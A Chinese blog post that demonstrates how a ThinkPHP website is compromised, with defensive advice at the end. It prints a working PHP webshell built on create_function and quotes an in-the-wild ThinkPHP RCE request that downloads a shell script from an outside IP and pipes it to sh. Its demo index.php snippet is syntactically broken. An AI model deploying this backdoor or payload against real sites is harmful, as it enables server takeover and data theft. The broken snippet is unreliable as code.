5幅动图让你秒懂黑客是如何入侵网站的

最近菠菜园更换了一台新的服务器,因为之前的备案号被取消于是索性也不再备案了。其实这个博客我是打算转让的,在转让之前顺便再写点东西,保持着目前搜索引擎的一个排名。

今天波波不打算写别的内容,主要聊聊黑客是如何入侵网站的。我们知道黑客入侵网站除了Ddos这种没有技术含量的攻击之外,稍微有技术含量的无外乎网站的一些漏洞和后门。

下面波波就以目前最流行的ThinkPHP框架为例来分享黑客入侵的过程。

1、搭建虚拟的攻击环境。

我们假设thinkPHP的入口文件在public目录下。在网站入口文件index.php文件中写入如下一段代码:

  1. <?php
  2. require __DIR__.'/Application/database.php';
  3. public function index(){
  4.     echo "<h1>MilFun 代码演示</h1><br><p>现在是正常状态的输出!</p>"

在database.php文件中我们写入数据库配置参数,随便写一些就行。

2、上传一段后门程序hack.php,源码如下:

  1. <?php
  2.  function config_local(){
  3.     @$conn = $_REQUEST;
  4.     return @($conn['config']);
  5. }
  6. @extract(array(conn=>create_function(NULL,config_local())));
  7. @extract(array($cless=>$conn()));

代码比较简单,仅作演示。

3、模拟攻击。

①正常状态下的显示:

黑客是如何入侵网站的

通过上图可以看到演示网站可以正常访问。

②访问下我们的后门程序。

黑客入侵网站过程

虽然是空白,但是也没有报错。接下来我们尝试获取服务器配置信息。

③获取PHP版本信息

黑客入侵网站过程

好了,现在服务器上PHP版本信息及数据库类型已经呈现出来了。

④网页重定向测试。

黑客是如何入侵网站

正常跳转到百度,那么你的网站已经可以随意跳转到任何黑客想要跳转的地方。到这里很多关注安全的朋友应该对“远程代码执行”有了一个初步的印象。

⑤获取数据库配置

黑客是如何入侵网站

到这一步不知道朋友们有没有感到惊恐?其实不用担心,尽管数据库配置信息被黑客获取到了,只要我们不开启数据库端口的远程访问权限就没有问题。所以我们平时一定要养成良好的习惯。

剩下删除文件,修改网站源代码的部分,波波就不再演示了。我们再回顾下整个攻击过程:

1、选定攻击目标。test.com

2、扫描网站漏洞,这里利用的是枚举目录和任意文件上传漏洞。

3、通过我们上传的后门程序了解服务器的配置信息,寻找更多可攻击的点。

4、利用现有的工具实施攻击。

本篇文章重在通过黑客入侵网站的演示过程,帮助朋友们更好的理解如何做好服务器的维护。当然了安全永远是相对的,没有100%的安全。在日常手写代码和服务器维护中一定养成好的习惯。对用户的输入做严格的过滤。

小福利:

不知道朋友们采用thinkPHP开发的项目有没有收到类似的请求:

  1. /index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=wget%20-q%20-O%20-%2082.146.58.234/p2.sh|sh

其实上述请求就是利用thinkphp核心漏洞进行攻击的一个实例。应对方法有两种:

第一种:升级Thinkphp核心文件。

第二种:添加防火墙规则,对请求的URL以及POST请求进行过滤。规则如下。

  1. \[function|exec|invokefunction]$

 

 

你想把广告放到这里吗?

发表评论

您必须 登录 才能发表留言!